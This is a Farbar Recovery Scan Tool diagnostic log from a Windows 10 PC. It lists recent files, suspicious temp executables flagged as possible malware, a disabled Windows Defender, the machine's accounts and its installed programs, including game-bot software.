2017-11-14 13:53 - 2017-10-15 06:05 - 004396032 ____C (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-11-14 13:53 - 2017-10-15 06:05 - 001293824 ____C (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-11-14 13:53 - 2017-10-15 06:04 - 005557760 ____C (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-11-14 13:53 - 2017-10-15 06:02 - 000079360 ____C (Microsoft Corporation) C:\WINDOWS\system32\LocationFrameworkInternalPS.dll
2017-11-14 13:53 - 2017-10-15 06:00 - 000061952 ____C (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-11-09 04:40 - 2017-11-09 04:40 - 036248176 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-11-09 04:40 - 2017-11-09 04:40 - 029279672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-11-09 04:40 - 2017-11-09 04:40 - 000624240 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000989808 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000940984 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000514672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-11-09 04:39 - 2017-11-09 04:39 - 000054192 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 001997752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438813.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 001682544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438813.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 001108408 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 000748144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-11-09 04:38 - 2017-11-09 04:38 - 000607160 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 040246384 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 035165624 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 004210288 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-11-09 04:37 - 2017-11-09 04:37 - 003623024 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 023474480 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 019212720 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 013379352 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 010986768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-11-09 04:30 - 2017-11-09 04:30 - 000633256 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-11-09 04:26 - 2017-11-09 04:26 - 001154296 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-11-09 04:26 - 2017-11-09 04:26 - 000902312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-11-09 04:26 - 2017-11-09 04:26 - 000810304 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 013994136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 011891200 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001351792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001342008 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001062920 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-11-09 04:25 - 2017-11-09 04:25 - 001056720 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-11-04 16:50 - 2017-11-04 16:50 - 000102038 ____C C:\Users\Jpoch\Downloads\pochop (1) (2).pdf
2017-11-04 16:35 - 2017-11-04 16:35 - 000102038 ____C C:\Users\Jpoch\Downloads\pochop (1) (1) (1).pdf
2017-11-02 20:25 - 2017-11-02 20:25 - 000000044 _____ C:\Users\Jpoch\jagex_cl_oldschool_LIVE.dat
2017-10-28 14:30 - 2017-11-17 15:36 - 000001966 ____C C:\Users\Public\Desktop\RuneMate.lnk
2017-10-28 06:18 - 2017-11-09 04:25 - 000648728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-10-28 06:18 - 2017-10-12 13:38 - 001988032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438800.dll
2017-10-28 06:18 - 2017-10-12 13:38 - 001606592 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438800.dll
2017-10-28 06:18 - 2017-10-12 13:38 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-10-28 06:18 - 2017-10-12 13:38 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-10-28 03:08 - 2017-10-28 03:08 - 000000000 ____D C:\Users\Jpoch\.jagex_cache_32
2017-10-28 03:03 - 2017-11-17 15:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RuneMate
2017-10-28 03:03 - 2017-11-17 15:36 - 000000000 ____D C:\Program Files (x86)\RuneMate
2017-10-28 02:53 - 2017-11-21 00:25 - 000000044 _____ C:\Users\Jpoch\jagex_cl_runescape_LIVE.dat
2017-10-28 02:53 - 2017-11-21 00:25 - 000000024 _____ C:\Users\Jpoch\jagexappletviewer.preferences
2017-10-28 02:53 - 2017-11-21 00:21 - 000000024 _____ C:\Users\Jpoch\random.dat
2017-10-28 02:53 - 2017-11-20 21:31 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape
2017-10-28 02:53 - 2017-11-02 20:25 - 000000000 ____D C:\Users\Jpoch\jagexcache
2017-10-28 02:53 - 2017-10-28 02:53 - 000002106 ___HC C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape.lnk
2017-10-28 02:53 - 2017-10-28 02:53 - 000002076 ___HC C:\Users\Jpoch\Desktop\RuneScape.lnk
2017-10-28 02:53 - 2017-10-28 02:53 - 000000000 ___DC C:\.jagex_cache_32
2017-10-28 02:52 - 2017-10-28 02:52 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\com.runemate.boot.Boot
2017-10-28 02:41 - 2017-10-28 06:02 - 000000000 ____D C:\Users\Jpoch\RuneMate
2017-10-26 21:09 - 2017-11-19 04:12 - 000000000 ____D C:\Users\Jpoch\AppData\Local\Jagex
2017-10-26 21:09 - 2017-11-19 04:12 - 000000000 ____D C:\ProgramData\Jagex
2017-10-26 21:09 - 2017-10-26 21:09 - 000000177 ____C C:\Users\Public\Desktop\RuneScape Launcher.url
2017-10-26 21:09 - 2017-10-26 21:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jagex
2017-10-26 21:09 - 2017-10-26 21:09 - 000000000 ____D C:\Program Files\Jagex
2017-10-26 20:53 - 2013-04-06 17:16 - 000203976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RICHTX32.OCX
2017-10-26 20:53 - 2013-04-06 17:16 - 000117507 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinet.ocx
2017-10-26 20:53 - 2013-04-06 17:16 - 000109248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSWINSCK.OCX
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-11-21 00:34 - 2017-05-29 00:49 - 000048666 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-11-21 00:28 - 2017-04-15 18:08 - 002858874 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-11-21 00:23 - 2017-06-21 16:19 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\Twitch
2017-11-21 00:23 - 2017-04-15 18:07 - 000000000 ____D C:\ProgramData\NVIDIA
2017-11-21 00:23 - 2016-11-26 15:19 - 000000000 ___DC C:\Program Files (x86)\Steam
2017-11-21 00:22 - 2017-04-15 18:15 - 000000006 ___HC C:\WINDOWS\Tasks\SA.DAT
2017-11-21 00:22 - 2017-04-15 18:08 - 000000000 ____D C:\Users\Jpoch
2017-11-21 00:22 - 2016-11-14 00:24 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\TSVNCache
2017-11-21 00:22 - 2016-11-11 03:58 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Spotify
2017-11-21 00:22 - 2016-11-11 03:58 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\Spotify
2017-11-21 00:22 - 2016-11-07 01:20 - 000000000 ___DC C:\Program Files (x86)\Mozilla Maintenance Service
2017-11-21 00:22 - 2016-11-07 01:18 - 000000000 __RDC C:\Users\Jpoch\OneDrive
2017-11-21 00:21 - 2017-03-18 03:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-11-20 23:50 - 2017-03-18 13:03 - 000000000 ____D C:\Program Files\Yaminguict Explorer for ERC
2017-11-20 23:47 - 2016-11-20 10:02 - 000000000 ___DC C:\Users\Jpoch\AppData\LocalLow\Mozilla
2017-11-20 23:05 - 2017-08-26 03:04 - 000000000 ___DC C:\Program Files (x86)\Mozilla Firefox
2017-11-20 23:05 - 2016-11-07 01:20 - 000001228 ____H C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-11-20 23:05 - 2016-11-07 01:20 - 000001216 ___HC C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-11-20 21:31 - 2017-07-22 22:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft
2017-11-20 21:31 - 2017-06-20 22:11 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon
2017-11-20 21:31 - 2016-11-22 01:51 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-11-20 21:24 - 2016-11-07 01:05 - 000000000 __HDC C:\WINDOWS\system32\GroupPolicy
2017-11-20 19:26 - 2017-04-15 18:15 - 000004166 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6C5C8D5B-3F1D-41FE-A3D3-3BC89DC30923}
2017-11-20 19:26 - 2017-03-18 13:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-11-20 19:26 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-11-20 19:25 - 2016-11-07 01:20 - 000002344 ____H C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-11-20 19:25 - 2016-11-07 01:20 - 000002332 ___HC C:\Users\Public\Desktop\Google Chrome.lnk
2017-11-20 19:23 - 2017-04-15 18:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-11-19 14:00 - 2017-05-23 04:32 - 000000000 ____D C:\ProgramData\VMware
2017-11-19 14:00 - 2017-05-23 04:32 - 000000000 ____D C:\Program Files (x86)\VMware
2017-11-19 14:00 - 2017-03-18 13:01 - 000000000 ____D C:\WINDOWS\INF
2017-11-19 13:57 - 2017-07-22 20:07 - 000001079 ____C C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-11-19 13:57 - 2017-07-22 20:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-11-19 13:52 - 2016-11-07 15:23 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\CrashDumps
2017-11-19 05:05 - 2017-04-08 23:19 - 000000000 ___DC C:\ProgramData\Oracle
2017-11-19 04:20 - 2017-05-23 04:34 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\VMware
2017-11-19 04:20 - 2017-05-23 04:34 - 000000000 ____D C:\Users\Jpoch\AppData\Local\VMware
2017-11-19 03:18 - 2017-04-15 18:08 - 002768814 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-11-19 03:10 - 2017-04-15 18:15 - 000003416 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-11-19 03:10 - 2017-04-15 18:15 - 000003292 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-11-19 02:50 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-11-19 02:50 - 2016-11-07 02:23 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\NVIDIA
2017-11-18 13:54 - 2017-04-15 18:07 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-11-18 13:54 - 2016-11-07 01:51 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-11-17 17:04 - 2017-04-15 18:15 - 000003188 _____ C:\WINDOWS\System32\Tasks\Shutdown
2017-11-17 14:18 - 2017-03-18 12:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-11-16 23:57 - 2016-11-07 01:20 - 000000000 ___DC C:\Users\Jpoch\AppData\Roaming\Mozilla
2017-11-15 20:33 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\rescache
2017-11-15 19:07 - 2017-04-15 18:06 - 000221848 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\Provisioning
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-11-15 19:07 - 2017-03-18 13:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-11-15 19:07 - 2016-11-07 01:17 - 000000000 _RHDC C:\Users\Public\AccountPictures
2017-11-14 13:57 - 2016-11-07 04:08 - 000000000 ___DC C:\WINDOWS\system32\MRT
2017-11-14 13:54 - 2017-10-11 07:07 - 127017032 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-11-14 13:54 - 2016-11-07 04:08 - 127017032 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-11-14 03:52 - 2017-04-15 18:15 - 000004600 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-11-14 03:52 - 2017-04-15 18:15 - 000004386 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-11-14 03:52 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-11-14 03:52 - 2017-03-18 13:03 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-11-09 04:38 - 2017-05-23 01:31 - 001039800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-11-09 04:38 - 2017-04-06 17:56 - 001624168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdagenco6420103.dll
2017-11-09 04:38 - 2017-04-06 17:56 - 000233904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys
2017-11-09 04:25 - 2017-04-06 17:56 - 004533184 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-11-09 04:25 - 2017-04-06 17:56 - 003859848 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-11-09 03:57 - 2017-04-06 17:56 - 000048442 _____ C:\WINDOWS\system32\nvinfo.pb
2017-11-04 17:40 - 2017-03-18 13:06 - 000835568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-11-04 17:40 - 2017-03-18 13:06 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-11-02 01:13 - 2017-07-22 21:04 - 000003376 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3446151218-491997262-3667861278-1001
2017-11-02 01:13 - 2016-11-07 01:18 - 000002363 ____C C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-10-30 17:47 - 2017-04-15 18:07 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-10-28 16:28 - 2016-11-07 01:51 - 000000000 ___DC C:\Users\Jpoch\AppData\Local\NVIDIA
2017-10-28 06:19 - 2017-04-15 18:07 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-10-28 06:14 - 2017-05-22 18:59 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003940 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2017-04-15 18:15 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-10-28 06:14 - 2016-11-07 02:22 - 000001485 ____C C:\Users\Public\Desktop\GeForce Experience.lnk
2017-10-28 03:00 - 2016-11-14 00:33 - 000000000 ___DC C:\Users\Jpoch\OneDrive\Documents\Buddywing
2017-10-28 03:00 - 2016-11-07 01:33 - 000000000 ___DC C:\ProgramData\Package Cache
2017-10-27 08:36 - 2017-04-15 18:07 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-10-27 08:12 - 2017-04-15 18:07 - 005960824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 002587768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 001766520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000607168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000449656 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000123000 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-10-27 08:12 - 2017-04-15 18:07 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-10-26 12:36 - 2017-08-15 21:37 - 000000000 ___DC C:\Users\Jpoch\Desktop\ExileB
2017-10-25 02:33 - 2017-04-15 18:07 - 007802921 _____ C:\WINDOWS\system32\nvcoproc.bin
 
Files to move or delete:
====================
C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
 
 
Some files in TEMP:
====================
2017-11-20 23:50 - 2017-11-20 23:50 - 000920448 _____ () C:\Users\Jpoch\AppData\Local\Temp\ANONYMIZERGADGETSETUP.1.000.1680.EXE
2017-11-19 13:52 - 2017-11-19 13:52 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol1821656749766913247.dll
2017-11-19 05:06 - 2017-11-19 05:06 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol2428701416925250673.dll
2017-11-19 05:19 - 2017-11-19 05:19 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol4782498541490236059.dll
2017-11-19 05:08 - 2017-11-19 05:08 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol4864669260505593703.dll
2017-11-19 13:54 - 2017-11-19 13:54 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol7959174752991907385.dll
2017-11-19 05:19 - 2017-11-19 05:19 - 000066048 ____N () C:\Users\Jpoch\AppData\Local\Temp\browsercontrol8588072608957644732.dll
2017-11-20 21:08 - 2017-09-04 21:26 - 001930840 _____ (Microsoft Corporation) C:\Users\Jpoch\AppData\Local\Temp\dllnt_dump.dll
2017-11-20 23:50 - 2017-11-20 23:50 - 000611820 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\GLOBAL_INSTALLER.EXE
2017-10-28 03:03 - 2017-11-17 15:36 - 000035680 _____ () C:\Users\Jpoch\AppData\Local\Temp\i4jdel0.exe
2017-11-19 05:19 - 2017-11-19 05:19 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna1454976152888162013.dll
2017-11-19 05:08 - 2017-11-19 05:08 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna2356716768812245971.dll
2017-11-19 05:03 - 2017-11-19 05:03 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna2571604950642716971.dll
2017-11-19 05:19 - 2017-11-19 05:19 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna6489124396195937904.dll
2017-11-19 13:54 - 2017-11-19 13:54 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna67602113627596301.dll
2017-11-19 05:06 - 2017-11-19 05:06 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna9127391409595174785.dll
2017-11-19 13:52 - 2017-11-19 13:52 - 000347147 ____N (Java™ Native Access (JNA)) C:\Users\Jpoch\AppData\Local\Temp\jna9211796949506494497.dll
2017-11-20 23:50 - 2017-11-20 23:50 - 004188040 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\ONESYSTEMCARE.EXE
2017-11-12 17:08 - 2017-11-12 17:08 - 013551616 _____ (Team RuneMate) C:\Users\Jpoch\AppData\Local\Temp\RuneMate_2_72_1_0_windows_i586_setup.exe
2017-11-16 15:43 - 2017-11-16 15:43 - 013549568 _____ (Team RuneMate) C:\Users\Jpoch\AppData\Local\Temp\RuneMate_2_73_0_0_windows_i586_setup.exe
2017-11-17 15:36 - 2017-11-17 15:36 - 013555712 _____ (Team RuneMate) C:\Users\Jpoch\AppData\Local\Temp\RuneMate_2_74_0_0_windows_i586_setup.exe
2017-11-19 02:50 - 2017-11-19 02:50 - 005885952 _____ () C:\Users\Jpoch\AppData\Local\Temp\setup (1).exe
2017-11-20 23:50 - 2017-11-20 23:50 - 000605254 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\Setup.exe
2017-11-20 23:50 - 2017-11-20 23:50 - 000591544 _____ (                                                            ) C:\Users\Jpoch\AppData\Local\Temp\SETUPTEXTTOTALK.EXE
2017-11-20 23:50 - 2017-11-20 23:50 - 000288272 _____ () C:\Users\Jpoch\AppData\Local\Temp\svchost.exe
2017-11-19 02:49 - 2017-11-19 02:49 - 002849376 _____ (BitTorrent Inc.) C:\Users\Jpoch\AppData\Local\Temp\VMwareworkstationfull14.0.06661328.exe
2017-11-19 13:57 - 2017-11-19 13:57 - 007189760 _____ (VS Revo Group                                               ) C:\Users\Jpoch\AppData\Local\Temp\VSUSetup.exe
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-11-11 18:22
 
==================== End of FRST.txt ============================
 
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Ran by Jpoch (21-11-2017 00:35:02)
Running from C:\Users\Jpoch\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads
Windows 10 Home Version 1703 15063.726 (X64) (2017-04-16 02:17:02)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3446151218-491997262-3667861278-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3446151218-491997262-3667861278-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3446151218-491997262-3667861278-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-3446151218-491997262-3667861278-501 - Limited - Disabled)
Jpoch (S-1-5-21-3446151218-491997262-3667861278-1001 - Administrator - Enabled) => C:\Users\Jpoch
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Active Directory Authentication Library for SQL Server (HKLM\...\{32C0D7B2-1046-43AC-98AD-B748E1910916}) (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (x86) (HKLM-x32\...\{F40FA676-46B1-4609-85EF-D2F1F79E0C0E}) (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Flash Player 27 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation)
AutoHotkey 1.1.26.01 (HKLM-x32\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Azure AD Authentication Connected Service (HKLM-x32\...\{8A1AD070-269F-4A15-AAB5-76AB896EF195}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
AzureTools.Notifications (HKLM-x32\...\{1E5CA362-39B6-4BD0-B9C0-69CF15F0FEA2}) (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (HKLM-x32\...\{37E53780-3944-4A6A-842F-727128E8616E}) (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blizzard App (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
CCleaner (HKLM\...\CCleaner) (Version: 5.29 - Piriform)
Dotfuscator and Analytics Community Edition 5.22.0 (HKLM-x32\...\{60018889-9E0F-43E8-9B89-29E8C828B40A}) (Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
Exilebuddy (HKLM-x32\...\{5caaff94-d2e7-4c9c-b87b-c3a773f8882a}) (Version: 0.2.4928.271 - Bossland GmbH)
